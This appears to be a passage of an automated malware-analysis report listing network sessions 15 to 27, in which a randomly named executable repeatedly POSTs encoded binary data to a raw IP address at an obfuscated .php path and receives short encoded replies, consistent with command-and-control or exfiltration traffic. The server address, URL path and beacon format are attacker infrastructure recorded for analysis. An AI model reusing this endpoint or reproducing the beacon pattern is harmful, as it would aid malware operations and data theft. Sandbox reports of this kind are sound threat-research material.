                                                                                  15192.168.2.54979989.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:52.507416964 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:02:52.859112024 CET2536OUTData Raw: 58 56 43 50 58 5d 52 53 55 5e 55 5a 54 58 50 57 57 5d 5c 5f 52 57 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XVCPX]RSU^UZTXPWW]\_RWQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ D.!W$=P>2*9?'U-8>7<=&!*V<$3?.$=!_.#Q,*
                                                                                  Dec 21, 2024 10:02:53.884541988 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:54.127334118 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.54980589.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:54.379646063 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:02:54.734133959 CET2536OUTData Raw: 5d 54 43 53 5d 5b 57 57 55 5e 55 5a 54 53 50 5d 57 5b 5c 5e 52 5e 51 58 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]TCS][WWU^UZTSP]W[\^R^QXZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#91,%-6*!./(X$3.(R4?Z%%*7'+.'=5!_.#Q,
                                                                                  Dec 21, 2024 10:02:55.772752047 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:55.996344090 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:55 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.54980889.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:56.241302013 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2532
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:02:56.593498945 CET2532OUTData Raw: 5d 51 43 5e 5d 57 52 50 55 5e 55 5a 54 5b 50 56 57 5c 5c 5a 52 50 51 5f 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]QC^]WRPU^UZT[PVW\\ZRPQ_ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ ,1U2)U?1%\,<<3<'.(*"?)Y%>T?'$?[8Z>%!_.#Q,*
                                                                                  Dec 21, 2024 10:02:57.617976904 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:57.852189064 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:57 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.54981289.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:58.084305048 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:02:58.437349081 CET2536OUTData Raw: 58 51 43 50 58 5c 52 53 55 5e 55 5a 54 5e 50 5d 57 5b 5c 5f 52 50 51 5c 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XQCPX\RSU^UZT^P]W[\_RPQ\ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#91 W1==>W5Z-Y8]$/<U985 \%1"+B$>.<*!_.#Q,2


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.54981889.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:59.104954004 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2100
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:02:59.452874899 CET2100OUTData Raw: 5d 56 43 53 5d 5e 52 53 55 5e 55 5a 54 5b 50 54 57 5a 5c 5f 52 5e 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]VCS]^RSU^UZT[PTWZ\_R^QVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ -W$R1>=!Z.3','.#,!]&2*P?$_?4X>!_.#Q,"
                                                                                  Dec 21, 2024 10:03:00.482969046 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:00.716202021 CET349INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:00 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 39 38 0d 0a 0e 1e 39 56 23 15 31 52 3c 3a 05 59 3d 01 3a 51 2a 3d 2a 5c 3b 0b 28 02 21 2c 2a 12 3e 13 27 10 24 2d 33 1e 36 2a 03 5c 36 11 3f 5f 29 0b 2e 58 01 1e 21 0b 20 55 21 54 27 3c 3f 55 3d 24 3a 5f 2b 10 2e 59 24 2f 2b 56 31 03 28 58 3c 14 33 0f 25 3d 22 5d 2d 2f 23 5a 3f 3e 0e 57 24 26 2b 51 03 1e 25 04 25 05 3c 0b 24 23 17 13 25 3d 22 00 37 3e 30 0b 29 38 3c 0e 37 5d 26 5a 2f 29 37 07 3f 5b 3a 11 3d 06 2d 00 30 3f 3f 53 26 04 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 989V#1R<:Y=:Q*=*\;(!,*>'$-36*\6?_).X! U!T'<?U=$:_+.Y$/+V1(X<3%="]-/#Z?>W$&+Q%%<$#%="7>0)8<7]&Z/)7?[:=-0??S&#T-,H1]V0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.54981989.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:59.225178957 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:02:59.577898979 CET2536OUTData Raw: 58 50 43 56 58 5a 52 55 55 5e 55 5a 54 5e 50 54 57 5c 5c 55 52 53 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XPCVXZRUU^UZT^PTW\\URSQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ D:&>=V*2!]9?$?:864Y9Z%>?$>-++%!_.#Q,2
                                                                                  Dec 21, 2024 10:03:00.603161097 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:00.836214066 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:00 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.54982689.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:01.072997093 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:03:01.421643972 CET2536OUTData Raw: 58 57 43 56 5d 5e 52 53 55 5e 55 5a 54 5d 50 56 57 58 5c 58 52 54 51 5c 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XWCV]^RSU^UZT]PVWX\XRTQ\ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ ,!<%%)W",,?%/:^:4<*%+$#Z+ Y)!_.#Q,>
                                                                                  Dec 21, 2024 10:03:02.452472925 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:02.684040070 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:02 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.54983289.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:02.936671019 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:03.291254044 CET2536OUTData Raw: 5d 55 43 51 58 5d 57 52 55 5e 55 5a 54 58 50 50 57 5f 5c 5f 52 54 51 57 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]UCQX]WRU^UZTXPPW_\_RTQWZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ E90S&=9U=2:,<$3?(S:^%P4?&&"1(4<>8^)%!_.#Q,*
                                                                                  Dec 21, 2024 10:03:04.310667038 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:04.544081926 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:04 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.54983389.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:04.789721012 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:05.140408993 CET2536OUTData Raw: 58 54 43 5e 5d 5c 57 56 55 5e 55 5a 54 5f 50 56 57 5f 5c 5d 52 53 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XTC^]\WVU^UZT_PVW_\]RSQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#.2#&=9=!%Z./;0?.(!P7?1T-<^+. ^+%!_.#Q,6


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.54983989.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:05.846609116 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2112
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:06.202867031 CET2112OUTData Raw: 5d 56 46 52 5d 5d 57 5f 55 5e 55 5a 54 5d 50 57 57 5a 5c 59 52 54 51 5e 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]VFR]]W_U^UZT]PWWZ\YRTQ^ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C: U%-5T=[-<#%<$:;!Q4<5[%"T(78+8_*5!_.#Q,>
                                                                                  Dec 21, 2024 10:03:07.216780901 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:07.456120014 CET349INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:07 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 39 38 0d 0a 0e 1e 39 57 34 2b 25 54 2b 2a 2c 03 2a 01 29 0c 29 3e 0c 5f 38 1c 2b 5f 35 02 2a 58 29 03 3f 5e 33 2d 2b 5c 22 39 2e 04 22 2f 37 59 3e 31 2e 58 01 1e 22 1c 23 30 31 57 25 3c 2f 56 29 37 08 5c 3c 07 3e 10 26 2f 27 1b 25 2a 3c 14 2b 03 2f 08 25 03 3d 02 2d 2c 27 1d 28 3e 34 1d 27 1c 2b 51 03 1e 25 02 26 2f 23 52 24 23 31 13 32 3e 3e 01 22 3d 33 56 3f 38 37 14 21 38 26 5d 3b 5f 2b 06 28 2e 3e 5b 3e 28 08 5e 24 02 2b 1b 25 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 989W4+%T+*,*))>_8+_5*X)?^3-+\"9."/7Y>1.X"#01W%</V)7\<>&/'%*<+/%=-,'(>4'+Q%&/#R$#12>>"=3V?87!8&];_+(.>[>(^$+%.#T-,H1]V0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.2.54984089.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:06.096024990 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:06.452903986 CET2536OUTData Raw: 5d 56 43 57 5d 5d 52 50 55 5e 55 5a 54 5a 50 50 57 5c 5c 5f 52 54 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]VCW]]RPU^UZTZPPW\\_RTQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ -!+1==!%\,?<'?3: 515<#](> ^*5!_.#Q,"
                                                                                  Dec 21, 2024 10:03:07.472363949 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:07.708254099 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:07 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.2.54984689.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:07.943376064 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:03:08.296780109 CET2536OUTData Raw: 5d 54 43 54 5d 5a 52 57 55 5e 55 5a 54 5e 50 56 57 5d 5c 5e 52 5e 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]TCT]ZRWU^UZT^PVW]\^R^Q]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C9$%)W=W9,,;'8V-8="?"&!"P*$+?4[*%!_.#Q,2
                                                                                  Dec 21, 2024 10:03:09.319072962 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:09.553232908 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:09 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.2.54985289.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:09.786612988 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
